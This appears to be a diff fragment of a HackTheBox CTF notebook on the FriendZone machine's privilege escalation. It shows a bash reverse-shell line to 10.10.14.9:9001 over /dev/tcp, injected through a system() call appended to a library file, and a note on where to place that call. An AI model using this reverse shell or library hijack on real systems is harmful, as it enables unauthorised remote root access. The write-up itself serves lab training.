ennozdd/HackTheBox/notebook_FriendZone/25 - PrivEsc.md/25 - PrivEsc.md

 system("bash -c 'bash -i >& /dev/tcp/10.10.14.9/9001 0>&1'")
 ```

-Ddd the system function call to the bottom of the page otherwise it won't work because `system` is defined in this library
+Add the system function call to the bottom of the page otherwise it won't work because `system` is defined somewhere in this library

 # Root shell
 ![](vx_images/4654216914797.png)